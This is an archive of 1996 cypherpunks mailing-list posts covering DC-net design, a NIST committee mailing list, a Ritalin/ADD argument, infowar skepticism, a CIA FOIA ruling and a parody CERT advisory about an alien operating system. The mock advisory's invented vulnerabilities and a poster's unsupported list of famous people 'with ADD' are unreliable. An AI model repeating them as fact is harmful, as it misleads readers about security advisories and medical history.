> > with tr on a few machines, however. Adding a '-c' after 'uniq' will tell
> > you how many times each word occured (useful for grepping out words that
> > appear too infrequently, or too frequently) .. 
> 
> Actually I am fairly sure that your selection of words will be mediocre
> at best. There are words (such as nethermost, insatiable, insufferable)
> that are almost never used in news.

According to Altavista:

nethermost   - 45
insatiable   - 200
insufferable - 200

I know I have too much free time.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeHp9bZc+sv5siulAQHjCgP6A/OuKaX/NwlkO9zhzbX2sBdKzajdKHHC
FegZI5jIMd9hSFUb1iPUzw5H8YVaCQFDrighNnxLYvncAHB5dxAnRz52XjH4PFxj
kDsH3CC3fN+x3Oh88HOwfcDKMiEAFbUkj+xSR5w6yxPt3mg9E27/xPef1Yg8bUWl
gbsK/V0emcU=
=Pr0B
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 9 Jul 1996 16:54:08 +0800
To: janke@unixg.ubc.ca
Subject: Re: Pseudo-DC-net Project
In-Reply-To: <m291cu1g0w.fsf@clouds.heaven.org>
Message-ID: <Pine.LNX.3.94.960709013255.1246C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 8 Jul 1996 janke@unixg.ubc.ca wrote:

> 
> Thank you for the comments, but I'm not sure I fully understand them 
> all. First of all what is a TLA? Second of all, and this seems to be

A TLA is a Three Letter Acronym.  Such examples would be FBI, NSA, DEA, and
CIA.
> 
> I hadn't thought of using a ring topology... Interesting. I'll think
> about that one some more.

The ring topology is definitely more secure.  A DC-Net has to have at least
three hosts to be of any use.  When a centralized server is used, the security
is basically lost.

> 
> How do hash trees help? Is that mentioned in the paper you cite? I'll
> take a look at that one before long. What's the title and author?

Hash trees help by preventing collisions while preserving anonymity.  The
property of hash trees is that it takes log 2(N) number of elements of the
tree to verify where N is the total number of elements in the tree.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeHwUrZc+sv5siulAQG9SAQAm7vPPFGjM/x0ntXTk9SZhNZ98WoRzHDT
6o1r+iWdZPBx1loAb8AGq+i8OumSrdDvVfdjGCDOp5smlFwJH/jSUBDHyi2Fkwp9
duzvukxHgazX7CQY9p585UX+y6Uu1d/Dfj74DzIIbyPBIwJNW9qzbAbUGQqXM1zR
zzuVA7RxPWI=
=qNZe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 9 Jul 1996 14:15:29 +0800
To: cypherpunks@toad.com
Subject: Re: TACDFIPSFKMI (fwd)
Message-ID: <199607090140.BAA16245@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 08 Jul 1996 16:36:09 
   From: Elaine Frye <elaine.frye@nist.gov> 
 
   Subject: Announcement re New TAC 
 
   [Snip Carl's forward] 
 
   [Distribution relocated from header] 
 
   To: Dunn@podesta.com (Elizabeth Dunn), Ditoston@btec.com, 
   ereed@novell.com, cameron@novell.com, jwinston@tis.com 
   (Joan Winston), ptd@tis.com (Peter Dinsmore), denny@tis.com 
   (Denny Branstad), steve@tis.com (Steve Walker),  
   kam@tis.com, landgrave@aol.com (Landgrave Smith), 
   perillo@dockmaster.ncsc.mil, anne.shepherd@nist.gov (Anne 
   Enright Shepherd), 100126.3650@COMPUSERVE.COM, roz@mtb.com 
   (Roszel Thomsen), abd@cdt.org, kkonechy@rnbo.com (Ken 
   Konechy), pfh@netscape.com (Peter Harter), romeror@frb.gov  
   (Ray Romero), karen.randall@att.com (Karen Randall), 
   jeff@netscape.com (Jeff Treuhaft), exp@mk.ibek.com (E. J. 
   Prior), rplesser@pipermar.com (Ron Greg_Garcia@aeanet.org 
   (Greg Garcia), csmith@steptoe.com (Clint Smith), 
   William_Baugh@cpqm.saic.com (William Baugh), 
   fred_mailman@hpatc1.desk.hp.com (Fred Mailman),         
   uscibproh@delphi.com (Melanie Janin), KaneS@wangfed.com 
   (Steve Kane), hill@po3.bb.unisys.com (John Hill),        
   peasley@worldbank.org (Peter Easley), 
   foreilly@worldbank.org (Frank O'Reilly), maitgmu@aol.com 
   (Tucker Cox), ghilborn@csc.com (Gene Hilborn),         
   padgett@tccslr.dnet.mmc.com (Padgett Peterson),        
   whitfield.diffie@Eng.Sun.Com (Whitfield Diffie),         
   jeff.rulifson@Eng.Sun.Com (Jeff Rulifson),       
   ankney@emc2-tao.fisc.com (Richard Ankney),       
   rmedlock@mitre.org (Roberta Medlock),        
   JNGUYEN@MILCHEV.COM (Jonathan Nguyen-Duy),         
   ttobin@atl.ge.com (Tim Tobin), csmother@atl.ge.com (Carl 
   Smothers), randy@mci.net (Randy Catoe), 
   denning@cs.cosc.georgetown.edu (Dorothy Denning), 
   jya@pipeline.com (John Young), dn@pipeline.com (Deborah 
   Natsios), brow@clark.net, mbohannon@banyan.doc.gov (Mark 
   Bohannon), ads012@email.mot.com (Don Sorter), 
   Mary_Smolenski@ita.doc.gov (Mary Smolenski), 
   lshomo@hqops.hq.nasa.gov (Lawrence Shomo), 
   Jean_M_Baronas@co.xerox.com (Jean Baronas), 
   jag@jgvandyke.com (Jonathan Gloster), rsabett@spyrus.com 
   (Randy Sabett), Martin.Ferris@treas.sprint.com (Martin 
   Ferris), Karla.King@treas.sprint.com (Karla King), 
   lthrash@hqamc.army.mil (Lawrence Thrash), 
   trstsc@tevm2.nsc.com (Russ Tobolic), 
   steve.katz@citicorp.com (Steve Katz), 
   jill.oliver@citicorp.com (Jill Oliver), jgrabo@infsec.com 
   (John Grabowsky), madavids@us.oracle.com (Mary Ann 
   Davidson), palamber@us.oracle.com (Paul Lambert), 
   geiter@mitre.org (Jisoo Geiter), 
   Ezzy_Dabbish-AMTE09@email.corp.mot.com (Ezzy Dabbish), 
   BFlowe@MCiMail.com (Ben Flowe), sking@mitre.org (Sue King), 
   ablee@mitre.org (Annabell Lee), murray2@vnet.ibm.com (Vera 
   Murray), french@zeke.ENET.dec.com (Roger French), 
   pescatore@idcg.com (John Pescatore), 
   barker@st1.ncsl.nist.gov (Elaine Barker), 
   FKeenan_+wshsr02+1Florence_Keenan+r%PGFM@mcimail.com 
   (Florence Keenan), SROSE42008@aol.com (Steve Rose), 
   john@ipower.nsc.com (John Power), david.bicknell@rbp.co.uk  
   (David Bicknell), mschneck@phoenix.Princeton.EDU (Melanie 
   Schneck), lhg@nrc.gov (Louis Grossman), 
   RAVENIS@novell.wd.cubic.com (Joe Ravenis), stw@boeing.com 
   (Steve Whitlock), corcorane@Washpost.com (Elizabeth 
   Corcoran), hoffman@seas.gwu.edu (Lance Hoffman), 
   Thorne_Graham@ccmail.irs.gov (Thorne Graham), 
   lovornj@dyncorp.com (Jan Lovorn), Squires@arpa.gov (Stephen 
   Squires), davido@cylink.com (David O'Brien), 
   al.williams@gsa.gov (Al Williams), JDRANDALL@vnet.ibm.com 
   (James Randall), RHDANCK@DELPHI.COM (Renee Danckwerth), 
   Kpauley@pipermar.com (Kay Pauley), PFarrell@gmu.edu (Pat 
   Farrell), darnstein@hns.com (Donald Arnstein), 
   Thomas_C_Jones@ccm.ch.intel.com (Tom Jones), 
   P26730@email.mot.com (Helen Hammond), 
   hpodell@ids2.idsonline.com (Harold Podell), beccag@bsa.org 
   (Becca Gould), mccord@nosc.mil (Marion McCord), 
   orestib/dcpo/bruceh%mcimail.com@micf.nist.gov (Bruce 
   Heiman), elaine.frye@nist.gov, cme@acm.org (Carl Ellison), 
   jhalpert@pipermar.com (J. Halpert), ads012@email.mot.com 
   (Don Sorter), paradise@wellsfargo.com (Jane Paradise), 
   Lynn.McNulty@internetmci.com (Lynn McNulty), 
   lawrence.shomo@hq.nasa (Larry Shomo)  
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 9 Jul 1996 17:17:45 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: What remains to be done.
Message-ID: <199607090608.CAA27451@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Jul 96 at 18:04, John F. Fricker wrote:
[..]
> One of these days Microsoft will officially release NT's IFS SDK. A few
> "preliminary" and incomplete copies of a 1993 beta release do float around
> but for a mere $50K there's a company that will sell you the complete source
> for an IFS. It's a crime that Microsoft hasn't shipped this SDK yet as the
> Installable File System is one of the great powers of NT.
> 
> So, if someone is interested in coughing up the $50K I know a couple NT
> programmers just chomping at the bit to build cool IFS's like PGPDrive, etc.

Coughing up a mere $200-500 (depending on the cmpany) to write a few
freeware  drivers for Windows NT/95 or OS/2 is a bit much for poor 
hackers like myself.

A GNU/FSF project should be to develop freeware DDKs for Windows or 
OS/2.  There'd be many grateful people out there.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 17:49:18 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090459.VAA24458@netcom14.netcom.com>
Message-ID: <199607090604.CAA11704@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Similarly while there might very well be some disorder of
> cognition for which amphetamines would be appropriate medication,
> prescribing them on the basis of which 10% of the population
> performs least well in the traditional "cells and bells" school
> environment is not it.

Fine, lets say that you are right, and that some number of children
could use Ritalin. Is it your opinion that Tim May is qualified to
diagnose children who do and don't need it? He appears to be claiming
that he can.

I will note, of course, that your contention about percentages and the
likelyhood that something is a disease doesn't really wash very
well. By your lights, then, heart disease couldn't be a "real" illness
given that a lot more than 10% of the population suffers from it to
one extent or another. Of course, we could simply redefine dying of a
heart attack as "normal" and then we could be done.

Sure, its possible that ADD is grotesquely overdiagnosed. Maybe its
possible that 10% of the population has it and that most of them
barely make it through life. Maybe its something in between. How do
you know? Have you done any studies? Have you even read the scientific
literature?

> The fact that some claim to be able to demonstrate ADD by
> "repeatable biological tests" carries no more weight than the
> ability to repeatably demonstrate that a person is short of
> stature by "repeatable tape measure tests."
>
> There is a difference between giving medication for a verifiable
> organic problem, like insulin for diabetes, or growth hormone for
> a pituitary defect, and giving it to the 10% shortest, or the 10%
> most likely to call their teachers bleep words.

How about giving people with hypertension blood pressure medication? I
mean, they are just "out of the norm", right? I mean, there is a
continuum of blood presures, yes? Why should we give the people at the
top of the spectrum medications, just because high blood pressures are
associated with vascular accidents?

I suppose you don't understand what it might be like for someone to be
unable to do their work no matter how heavy the threat against them if
they don't, and no matter how easy it is. There are people out there
who can't get themselves to pay a phone bill or throw out the
newspapers for months on end -- they just can't get themselves to
dance around into the task no matter how hard they try, no matter how
great the threat (job loss, etc) to them is. Perhaps you would call
such a person "crazy". After all, you reason, YOU never had any
trouble doing any of those things. Maybe they are just complete fakers
-- they just need a kick in the ass, right. Well, fine. Many such
people, given a small dose of Ritalin, miraculously recover from their
"crazyness", or their "faking" or whatever it is. They start paying
their bills, writing the overdue reports at the office, listening in
school, etc. They cease to play incessantly with fidget toys and they
get on with their lives. Maybe you would prefer to "help" them by not
letting them get medication. Maybe its "unnatural". Could you explain
to me, however, how you are making their lives better by not giving
them their meds? I mean, what concretely is better about their lives?

>  > Has it occurred to you that many of the children in
>  > question are happy being medicated, as are many adults? In
>  > any case, who are you to tell other people what's good for
>  > them?
> 
> Again, to return to the height analogy, doctors have to throw
> short parents seeking human growth hormone[...]

You miss the point. You spoke of involuntarily medicated kids. Most of
the kids aren't involuntarily medicated.

> The price of giving the patient (or the patient's parents)
> everything they want is [...] classrooms full of obedient
> citizen-units in Soma-induced trances.

Ritalin does not induce a zombie-like trance, as the numerous people
on this mailing list who take it can tell you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Tue, 9 Jul 1996 20:22:08 +0800
To: "'cypherpunks@toad.com>
Subject: RE: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01BB6D3B.DA8A10C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Perry E. Metzger

I suppose you don't understand what it might be like for someone to be
unable to do their work no matter how heavy the threat against them if
they don't, and no matter how easy it is. There are people out there
who can't get themselves to pay a phone bill or throw out the
newspapers for months on end -- they just can't get themselves to
dance around into the task no matter how hard they try, no matter how
great the threat (job loss, etc) to them is. 
......................................................................


Drugs create a picture of coercion - where the mind is coerced into a state arrived at not by thoughtful consideration, but by round-about ways of achieving the desired result.  This is what makes some people wary of them, but make them appealing to others who find this very feature attractive - that they can get results without having to think about it.

There are times when people have been totally unmotivated to take care of themselves or the mundane matters in life because they were not involved in the pursuits which were of true value to them, and life "lost its meaning".  

Putting one's priorities into perspective can do a lot towards feeling motivated to attend to life's minor contingencies, while elevating the lesser items to the top of the hierarchy can totally dissipitate one's energies and interest.

What if someone was working at a "practical" kind of job, living the kind of life prescribed by someone else, when what they really wanted to do was something related to fine art or other field, living a different kind of "life-style"?   This could be so depressing that subconsciously they would finally rebel from supporting that false existence, and find themselves with no energy to move.

Maybe Ritalin could make them forgot their true interest which was lying dormant, pushed away by who-knows-what kind of arguments against it, and help them to start paying attention again to those mundane, irrelevant aspects of existence.  Maybe it could help them forget the *point* of their existence and they could attend to ordinary things which are easily understood and accomplished without too much creative energy.  Maybe Ritalin could help force them to pay attention, in spite of the protest from their submerged psychology.

Maybe.

In taking 'beneficial' drugs there's always a question of whether someone's mind is being helped into awareness or overpowered into submission, even if the results seem to be acceptable to everyone.

You're right, Perry, that no one should be making that decision for others.  I do think, though, that achieving self-command by a conscious knowledge of what is right for one's nature is actually the most beneficial (and less controversial).

(But I wonder how this would apply to crypto.  Hmmmmmmm - only in reference to those evil old men in the govmt who......might allow it to be prescribed indiscriminately.)

     ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 9 Jul 1996 18:28:22 +0800
To: cypherpunks@toad.com
Subject: FUD-Con V: DC
Message-ID: <199607090640.CAA11873@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Jul 96 at 14:10, winn@Infowar.Com wrote:
[..]
>  Historically, civil defense has meant to protect citizenry against hostile
> military actions. Today, with the specter of Information Warfare representing
> new challenges to late-industrial and information age nation-states, the rules
[..]
Are these really "new" challenges?

>  	- The Power grid is the basis of most of modern society. With it gone,
> not much else happens.  If you think this is just a matter of building more
> generators, think again--what happens if the factories that *make* the
> generators are taken down, too? 

You haven't lived in a hurricane prone area and lost your 
electricity for most of a month, have you?  Many of the generators
are already in place.  The power grid is not centralised, so it's difficult
to take down everything for a long period of time (long enough to be 
truly detrimental to a lot of people) quickly enough (that would require
some non-informational real-life bombing and warfare).

>  	- The Communications infrastructure: land, sea, air and satellite. 95% 
> military communications go over the public networks, and 100% of all financial
> and industrial communications. Is it worth protecting?

Is it so easy to take a whole network down?  What about various radio 
operations (HAMs, Marineband, FM, etc.)?  And don't forget 
automobiles and roads as last-resort communications.

>  	- The Global Financial structure depends upon the first two
> infrastructures, and is perhaps the most vulnerable to theft and denial of
> service attack.  99+% of all "wealth" is digital--what happens if it vaporizes?

I'm skeptical of that figure (many institutions maintain several 
printouts and have contingencies to do things by hand... for no 
other reason than computers go down without human interference).

>  	- Transportation systems rely upon the other three. The air traffic
[..]

Not really. Automobiles and buses rely on very little.  In major 
disasters there are ways to keep limited air and train traffic 
running.

>  Without all of these infrastructures properly and reliably functioning, the
> private sector and the national security community cannot function. No heat, no
[..]

You sound as if you have not been in a place hit by natural disasters 
such as earthquakes, hurricanes, major floods, etc.  These cause much 
more damange to infrastructures as well as human life than any 
organized action could, save for an all-out physical war.  Life still 
manages to go on.

> air conditioning, no food distribution, no light, no radio or TV, no Internet.
> Are we prepared?  Do we have a a crisis response for the day money as we  know
> it vanishes?

Isn't that what FEMA is for?  Do you want FEMA involved with the 
'net?  Or would you rather get the DoD, NSA, FBI also involved with 
"Emergency Management"?!?

>  Electronic Civil Defense will soon become a critical component of any nation's
> well being while the needs of both the private sector and government converge.
> The convergence of military and civilian interests that Mr. Schwartau predicted

Yes... it's called key escrow.

> two years ago is happening before our eyes. Defensive and commercial postures
> have so intertwined as to make them indistinguishable.

That still implies empowering the state rather than allowing entities 
(individuals and corporations) to protect themselves.

I'm skeptical of much of the InfoWar hype.

Yes, there are important security issues (data integrity and 
preservation).  But these also cross over with non-info disaster
preparations.

I also question whether large corporations and banks have compatible 
interests with individuals.  It seems entirely possible that measures 
could be taken to protect the former at the expense of the latter.
It's also dangerous to give LEA's another bogeyman to use. Very 
dangerous.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Tue, 9 Jul 1996 20:55:23 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <printing.1088.0004B9A3@explicit.com>
Message-ID: <Pine.SUN.3.94.960709022546.4459B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE----- 

On July 8th, 1996 Herr Doctor Duvos wrote:
 
>Medicating a disease is fine.  Recreational uses of relatively
>harmless intoxicants and are also fine.  It is the inappropriate
>use of strong medicines with serious side effects by clueless
>people for vague criteria like "reaching his or her potential"
>that I have a problem with. 
 
I have a problem with people like Mike Duvos who think that 
folks like myself and others on this list with ADD use having 
ADD as a crutch for being fidgety, not getting their work done
on time, or worst yet, Fired.
 
I wish people like Mr. Duvos could walk a mile in my shoes before
making off the cuff remarks, I wish I could get jobs done on time,
I wish that I could finish one project before starting three more!
My office looks like someone tossed a hand grenade in it,
Proposals to the left, Job quotes to the right, jobs is various 
states of completion, Lost jobs to my inattentivness to my clients,
Lost good clients because of having ADD and not knowing it!
 
I wish I would have known about ADD eariler than now, I might
not have been the complete fuck-up that I was in school, and worst
than that, The nearly ten years after high school.  One of my wishes
did come true, and that was finding out that I do have ADD.
 
Ritalin has been a godsend, I am able to dialin when I have to.
Ritalin is not the only drug for treating ADD, Prozac works for
some.  There are times when I need the boundless energy to
find time to be creative and I stop taking my meds, but its only
for short periods, I remember all too well what I was like without
knowing what the problem was with work, love, and life in 
general.
 
Below is a list of famous people with Attention Deficit Disorders 
and/or Learning Disorders, and I'd be willing to bet that Perry Metzger
either has, or knows someone with ADD. 
 
Albert Einstein, Galileo, Mozart, Wright Brothers, Leonardo da Vinci,
Bruce Jenner, Tom Cruise, Charles Schwab, Henry Winkler, Danny Glover,
Walt Disney, John Lennon, Winston Churchill, Henry Ford, 
Stephen Hawkings, Jules Verne, Alexander Graham Bell, Woodrow Wilson, 
Hans Christian Anderson,Beavis, Nelson Rockefeller, Thomas Edison, 
Gen. George Patton, Agatha Christie, John F. Kennedy, Whoopi Goldberg, 
Rodin, Thomas Thoreau, David H. Murdock, Dustin Hoffman, Pete Rose, 
Russell White, Jason Kidd, Russell Varian, Robin Williams, Louis Pasteur, 
Werner von Braun, Dwight D. Eisenhower, Robert Kennedy, alberto Tnmba
Prince Charles, Gen. Westmoreland, Eddie Rickenbacker, Gregory Boyington, 
Harry Belafonte, F. Scott Fitzgerald, Steve McQueen, George C. Scott, 
Tom Smothers, Lindsay Wagner, George Bernard Shaw, Beethoven, Carl Lewis, 
Jackie Stewart, "Magic" Johnson, Weyerhauser family, Wrigley, John Corcoran.
 
One can only wonder how much more great some of the people on this list would 
be today if they knew ADD back then. 
 
 
William Knowles
erehwon@c2.org
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMeI+wgURbnwsNLz5AQHM6AP/Zln3eu50jKdhkER4Go3uBp0a4zlVUYti
pW71AHLR8VydFaMM7iJFhYmv7vgFeuA1cAo27Hq1Pb8LZ/uucPRACKI8ku/XsVHh
9wdPsEKXMo0pHftnVHmuFb3dVtAA9jYKfGw3SwpktNkACQMvGHU2Z5+DkbetvSZm
xrMSjCpxlvM=
=ucXF
-----END PGP SIGNATURE-----
 
--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: panzer@dhp.com (Matt)
Date: Tue, 9 Jul 1996 17:49:08 +0800
To: cypherpunks@toad.com
Subject: Re: Grubor remailer? (Was Re: Lucifer remailer)
In-Reply-To: <199606272114.RAA04139@phoenix.iss.net>
Message-ID: <4rsugh$evg@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


The joys of having mailing lists gatewayed to news, you find this stuff 
weeks late....  Sorry for the delay

Alex F (alexf@iss.net) wrote:
: > dhp is not "Grubor's domain," it's just a Pittsburgh ISP
: > with liberal terms of service (which is why it can run
: > remailers).    Perhaps you're thinking of "manus.org"?
: > 

: I thought that DHP is mostly Canadian.  I know that Panzer deals w/ 
: them & he is running from Pitt. but I think that the others are 
: mostly from Canada.  I work w/ a few of them, but they are not here 
: to ask about this (at the moment.  They just went out for dinner).  I 
: don't think that DHP (Data Haven Project) is really an ISP per se...

DHP is an ISP.  We are small, but this is mostly because we have a small
dialin pool and are not trying to compete with all the local providers for
people who are "learning the 'net".  We are looking for people who are
interested in a second account for privacy, and are at least competent to
know what a "shell account" is.  If you would want some more info, feel
free to hit our web page (though it's partially out of date), or drop me
some email. 

As to "grubor's domain" I'll be more than happy to tell you that DHP.COM
is not his domain.  Refer to the Grubor faq for more information on the
number of Pittsburgh ISP's he's joined, etc... 


-- 
 -Matt     (panzer@dhp.com)                         DI-1-9026
 "That which can never be enforced should not be prohibited."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 9 Jul 1996 21:26:05 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Pseudo-DC-net Project
In-Reply-To: <Pine.LNX.3.94.960709013255.1246C-100000@gak>
Message-ID: <Pine.SUN.3.94.960709060446.10769B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 9 Jul 1996, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On 8 Jul 1996 janke@unixg.ubc.ca wrote:
> 
> > 
> > Thank you for the comments, but I'm not sure I fully understand them 
> > all. First of all what is a TLA? Second of all, and this seems to be
> 
> A TLA is a Three Letter Acronym.  Such examples would be FBI, NSA, DEA, and
> CIA.

Yes, but it _stands_ for Three Letter Agency.  (Or at least I always
thought so)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Wed, 10 Jul 1996 02:16:11 +0800
To: cypherpunks@toad.com
Subject: stupid national security excuse again ...
Message-ID: <199607091410.HAA28836@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok.  Not that I really care, at this point, who really killed Kennedy
or whether there was this or that conspiracy, but I am really sick of
this bull shit "national security" excuse.

What kind of "national security" excuse could there be for the CIA to
say whether they confirm or deny the employment of some guy (whom they
could easily discredit by saying that they have nothing to do with
him)?

This sort of maneuvoring by (insert your favorite TLA) is just exactly
why I am so against encryption regulation by the government.  They can
snowjob anyone just by saying "national security".

Ern

--------

 COURT REJECTS BID FOR FACTS ON ALLEGED KENNEDY PLOTTER
 
 REUTERS
 
 SAN FRANCISCO - A federal appeals court Monday rejected a bid to force
 the Central Intelligence Agency (CIA) to disclose whether it employed
 a man who claimed he was involved in the murder of President John
 F. Kennedy.
 
 The 9th U.S. Circuit Court of Appeals in San Francisco denied an
 appeal by a California judge who sued to try to force the CIA to
 disclose information about Claude Capehart.
 
 Capehart, who died in 1989, claimed to have been a CIA agent involved
 in the November 1963 assassination of Kennedy in Dallas, according to
 the court ruling.
 
 In February 1992, David Minier, a municipal court judge in Chowchilla,
 California but acting as a private citizen in this case, made a
 Freedom of Information Act request to the CIA to say whether the
 agency had ever employed Capehart.
 
 Minier, 61, later asked the CIA for all records of the ''activities,
 assignments, actions and whereabouts of (Capehart) during the month of
 November 1963,'' according to the Appeals Court ruling.
 
 The CIA denied Minier's request, saying that to confirm or deny a
 relationship between the CIA and Capehart ``would jeopardize national
 security and compromise CIA sources and methods,'' the ruling said.

 ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 10 Jul 1996 03:40:08 +0800
To: cypherpunks@toad.com
Subject: CERT Advisory CA-96.13 - Alien/OS Vulnerability
Message-ID: <v01540b00ae082d7015cf@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Subject: CERT Advisory CA-96.13 - Alien/OS Vulnerability
From: CERT Bulletin <cert-advisory@cert.org>
Newsgroups: comp.security.announce, rec.humor

=============================================================================
CERT(sm) Advisory CA-96.13
July 4, 1996

Topic: ID4 virus, Alien/OS Vulnerability

- -----------------------------------------------------------------------------

The CERT Coordination Center has received reports of weaknesses in
Alien/OS that can allow species with primitive information sciences
technology to initiate denial-of-service attacks against MotherShip(tm)
hosts.  One report of exploitation of this bug has been received.

When attempting takeover of planets inhabited by such races, a trojan
horse attack is possible that permits local access to the MotherShip
host, enabling the implantation of executable code with full root access
to mission-critical security features of the operating system.

The vulnerability exists in versions of EvilAliens' Alien/OS 34762.12.1
or later, and all versions of Microsoft's Windows/95.  CERT advises
against initiating further planet takeover actions until patches
are available from these vendors.  If planet takeover is absolutely
necessary, CERT advises that affected sites apply the workarounds as
specified below.

As we receive additional information relating to this advisory, we will
place it in

        ftp://info.cert.org/pub/cert_advisories/CA-96.13.README

We encourage you to check our README files regularly for updates on
advisories that relate to your site.

- -----------------------------------------------------------------------------

I.    Description

      Alien/OS contains a security vulnerability, which strangely enough
      can be exploited by a primitive race running Windows/95.  Although
      Alien/OS has been extensively field tested over millions of years by
      EvilAliens, Inc., the bug was only recently discovered during a
      routine invasion of a backwater planet.  EvilAliens notes that
      the operating system had never before been tested against a race
      with "such a kick-ass president."

      The vulnerability allows the insertion of executable code with
      root access to key security features of the operating system.  In
      particular, such code can disable the NiftyGreenShield (tm)
      subsystem, allowing child processes to be terminated by unauthorized
      users.

      Additionally, Alien/OS networking protocols can provide a
      low-bandwidth covert timing channel to a determined attacker.


II.   Impact

      Non-privileged primitive users can cause the total destruction of
      your entire invasion fleet and gain unauthorized access to
      files.


III.  Solution

      EvilAliens has supplied a workaround and a patch, as follows:

      A. Workaround

         To prevent unauthorized insertion of executables, install a
         firewall to selectively vaporize incoming packets that do not
         contain valid aliens.  Also, disable the "Java" option in
         Netscape.

         To eliminate the covert timing channel, remove untrusted
         hosts from routing tables.  As tempting as it is, do not use
         target species' own satellites against them.


      B. Patch

         As root, install the "evil" package from the distribution tape.

         (Optionally) save a copy of the existing /usr/bin/sendmail and
         modify its permission to prevent misuse.


- ---------------------------------------------------------------------------
The CERT Coordination Center thanks Jeff Goldblum and Fjkxdtssss for
providing information for this advisory.
- ---------------------------------------------------------------------------

If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident
Response and Security Teams (FIRST).

We strongly urge you to encrypt any sensitive information you send by email.
The CERT Coordination Center can support a shared DES key and PGP. Contact the
CERT staff for more information.

Location of CERT PGP key
         ftp://info.cert.org/pub/CERT_PGP.key

CERT Contact Information
- ------------------------
Email    cert@cert.org

Phone    +1 412-268-7090 (24-hour hotline)
                CERT personnel answer 8:30-5:00 p.m. EST
                (GMT-5)/EDT(GMT-4), and are on call for
                emergencies during other hours.

Fax      +1 412-268-6989

Postal address
        CERT Coordination Center
        Software Engineering Institute
        Carnegie Mellon University
        Pittsburgh PA 15213-3890
        USA

CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
        http://www.cert.org/
        ftp://info.cert.org/pub/

CERT advisories and bulletins are also posted on the USENET newsgroup
        comp.security.announce

To be added to our mailing list for CERT advisories and bulletins, send your
email address to
        cert-advisory-request@cert.org


Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided it
is used for noncommercial purposes and the copyright statement is included.

CERT is a service mark of Carnegie Mellon University.



--
